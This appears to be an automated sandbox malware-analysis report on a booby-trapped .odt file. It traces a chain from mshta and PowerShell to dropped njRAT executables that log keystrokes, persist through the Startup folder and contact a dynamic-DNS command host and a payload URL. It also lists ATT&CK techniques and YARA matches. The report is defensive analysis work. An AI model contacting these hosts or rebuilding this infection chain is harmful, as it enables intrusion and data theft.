Loading ...

Play interactive tourEdit tour

Analysis Report AutoformLiscence bls activation.odt

Overview

General Information

Joe Sandbox Version:27.0.0 Red Achat
Analysis ID:967598
Start date:30.09.2019
Start time:19:54:47
Joe Sandbox Product:Cloud
Overall analysis duration:0h 9m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:AutoformLiscence bls activation.odt
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.adwa.spyw.expl.evad.winODT@19/16@43/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 3.4% (good quality ratio 3.1%)
  • Quality average: 76.2%
  • Quality standard deviation: 30.9%
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 170
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .odt
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe, svchost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
njRat
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsWindows Management Instrumentation1Startup Items2Startup Items2Software Packing11Input Capture1Security Software Discovery11Remote File Copy1Email Collection1Data Encrypted1Remote File Copy1
Replication Through Removable MediaScripting1Registry Run Keys / Startup Folder221Access Token Manipulation1Disabling Security Tools21Network SniffingFile and Directory Discovery11Remote ServicesInput Capture1Exfiltration Over Other Network MediumStandard Cryptographic Protocol2
Drive-by CompromisePowerShell2Accessibility FeaturesProcess Injection1Scripting1Input CaptureSystem Information Discovery12Windows Remote ManagementClipboard Data1Automated ExfiltrationStandard Non-Application Layer Protocol2
Exploit Public-Facing ApplicationExploitation for Client Execution1System FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesQuery Registry1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol12
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessAccess Token Manipulation1Account ManipulationProcess Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceProcess Injection1Brute ForceApplication Window Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceScriptingPath InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\exploit.exeAvira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeAvira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeAvira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\exploit.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeJoe Sandbox ML: detected
Multi AV Scanner detection for submitted fileShow sources
Source: AutoformLiscence bls activation.odtVirustotal: Detection: 28%Perma Link
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 16.0.dllhost.exe.210000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 10.2.exploit.exe.1d0000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 11.0.dllhost.exe.210000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 15.0.dllhost.exe.210000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 11.2.dllhost.exe.210000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 10.0.exploit.exe.1d0000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 15.2.dllhost.exe.210000.0.unpackAvira: Label: TR/Dropper.Gen7
Source: 16.2.dllhost.exe.210000.0.unpackAvira: Label: TR/Dropper.Gen7

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\mshta.exeJump to behavior

Networking:

barindex
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: amibas8722.ddns.net
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4034EDD1-39EC-4103-8348-B2C91C1BCCBB}.tmpJump to behavior
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: 1.top4top.net
Urls found in memory or binary dataShow sources
Source: WINWORD.EXE, 00000000.00000002.737062201.03570000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: WINWORD.EXE, 00000000.00000002.750721612.09630000.00000004.00000001.sdmpString found in binary or memory: https://1.top4top.net/p_1301n6ked1.jpg
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to log keystrokes (.Net Source)Show sources
Source: exploit.exe.9.dr, kl.cs.Net Code: VKCodeToUnicode
Source: dllhost.exe.10.dr, kl.cs.Net Code: VKCodeToUnicode
Source: 10.2.exploit.exe.1d0000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: 10.0.exploit.exe.1d0000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, kl.cs.Net Code: VKCodeToUnicode
Source: 11.0.dllhost.exe.210000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: 11.2.dllhost.exe.210000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: 15.0.dllhost.exe.210000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: 15.2.dllhost.exe.210000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: 16.0.dllhost.exe.210000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Source: 16.2.dllhost.exe.210000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

E-Banking Fraud:

barindex
Found strings which match to known bank urlsShow sources
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: beneficial equals www.beneficial.com (Beneficial National Bank)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: bluestem equals www.bluestem.com (Bluestem National Bank)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: citynational equals www.citynational.com (City National Bank of Florida)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: colonial equals www.colonial.com.au (Colonial State Bank)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: countrywide equals www.countrywide.com (Countrywide Financial Corp.)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: huntington equals www.huntington.com (Huntington Bancshares)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmpString found in binary or memory: treasury equals www.treasury.boi.ie (Bank of Ireland Group Treasury)

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\exploit.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004CB2EE NtQuerySystemInformation,9_2_004CB2EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004CB2CC NtQuerySystemInformation,9_2_004CB2CC
Creates mutexesShow sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\bde52a20d668d6f304b9db902c7cfc6b
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Yara signature matchShow sources
Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
